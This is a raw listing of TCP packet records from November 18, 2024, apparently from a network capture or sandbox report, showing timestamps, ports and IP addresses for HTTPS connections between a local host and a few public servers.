                                                                                                                              Nov 18, 2024 17:55:50.331579924 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.332526922 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.332596064 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.435657978 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.435801029 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.436064005 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.436140060 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.437164068 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.437237978 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.437649965 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.437721014 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.438373089 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.438440084 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.511744022 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.511847019 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.512626886 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.512693882 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.513314962 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.513370037 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.514158964 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.514235973 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.515126944 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.515187025 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.515197039 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.515240908 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.515242100 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.515289068 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.515360117 CET49730443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.515378952 CET44349730104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.519392014 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.519429922 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.519495964 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.519751072 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.519761086 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.536432028 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:50.583328009 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.586601019 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.587104082 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.587126970 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.587465048 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.587824106 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.587878942 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.587995052 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.635332108 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.665558100 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.665610075 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.665693045 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.665924072 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.665937901 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.716820955 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.716902971 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.716965914 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:50.717675924 CET49725443192.168.2.17208.91.198.81
                                                                                                                              Nov 18, 2024 17:55:50.717694044 CET44349725208.91.198.81192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.733294010 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.733355999 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.733443975 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.734003067 CET49732443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:50.734035015 CET44349732104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:50.863548040 CET4968280192.168.2.17192.229.211.108
                                                                                                                              Nov 18, 2024 17:55:51.327559948 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.327889919 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.327935934 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.329168081 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.329505920 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.329644918 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.329782963 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.373434067 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.461673975 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.462085962 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.462109089 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.462466955 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.462790966 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.462862015 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.462943077 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.463026047 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.463057041 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489144087 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489193916 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489293098 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.489330053 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489393950 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489423990 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489449024 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.489466906 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.489521980 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.490097046 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.490149975 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.490195990 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.490204096 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.532429934 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.532444000 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.580411911 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.614871979 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.615358114 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.615433931 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.615444899 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.615489960 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.615550995 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.615818977 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.615967989 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.616071939 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.616085052 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.616560936 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.616621971 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.616630077 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.659390926 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.659405947 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.707428932 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.748990059 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.749049902 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.749135971 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.749155998 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.749468088 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.749524117 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.749531984 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.749953985 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.750008106 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.750015974 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.750637054 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.750701904 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.750709057 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.751116991 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.751147985 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.751173973 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.751174927 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.751187086 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.751218081 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.755537033 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.755593061 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.755619049 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.755640984 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.755661964 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.755705118 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.755999088 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.756051064 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.756098986 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.756107092 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.756901979 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.756936073 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.756961107 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.756968975 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.757014036 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.803421021 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.855957031 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.871440887 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.871866941 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.871943951 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.871958017 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.871999979 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.872060061 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.872339010 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.872492075 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.872538090 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.872550011 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.873289108 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.873358965 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.873370886 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.873754025 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.873826027 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.873837948 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.873891115 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.875000000 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875032902 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875061035 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.875098944 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875154972 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.875737906 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875807047 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875837088 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875868082 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.875885010 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.875933886 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.876612902 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.931421041 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.931461096 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.979579926 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.986036062 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.986160994 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.986181974 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.986232042 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.986747026 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.986840010 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.987108946 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.987174034 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.988301992 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.988370895 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.991750002 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.991950989 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.992027044 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.992064953 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.992201090 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.992270947 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.992280960 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.992750883 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.992805958 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.992815018 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.993489981 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.993542910 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.993551970 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.993622065 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.993660927 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.993668079 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.994469881 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:51.994524956 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:51.994537115 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.043454885 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.112109900 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.112272978 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.112696886 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.112786055 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.113529921 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.113600016 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.113667965 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.113738060 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.118571043 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.119133949 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.119168043 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.119203091 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.119239092 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.119298935 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.119649887 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.119699001 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.119748116 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.119756937 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.120248079 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.120305061 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.120312929 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.121309996 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.121395111 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.121403933 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.121459961 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.157854080 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.157955885 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.225925922 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.226079941 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.226268053 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.226315975 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.227066040 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.227132082 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.234541893 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.234633923 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.234957933 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.235023022 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.236063004 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.236131907 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.236709118 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.236773968 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.240454912 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.240534067 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.240715027 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.240767956 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.363487005 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.363643885 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.364265919 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.364352942 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.364898920 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.364963055 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.365461111 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.365557909 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.381724119 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.381844997 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.382105112 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.382174015 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.382502079 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.382581949 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.383588076 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.383651018 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.383709908 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.383831978 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.383850098 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.383882999 CET44349733104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.383908033 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.383936882 CET49733443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.407326937 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.407424927 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.467245102 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.467411995 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.467618942 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.467674971 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.480462074 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.480650902 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.481339931 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.481419086 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.576751947 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.576946020 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.577181101 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.577239037 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.578003883 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.578064919 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.591409922 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.591519117 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.591943026 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.592010021 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.629200935 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.629333019 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.643444061 CET49675443192.168.2.17204.79.197.203
                                                                                                                              Nov 18, 2024 17:55:52.694156885 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.694238901 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.694924116 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.694986105 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.695548058 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.695600986 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.695611954 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.695628881 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.695674896 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.695760965 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.695777893 CET44349734104.18.94.41192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:52.695790052 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.695825100 CET49734443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.698987007 CET49735443192.168.2.17104.18.94.41
                                                                                                                              Nov 18, 2024 17:55:52.699033976 CET44349735104.18.94.41192.168.2.17
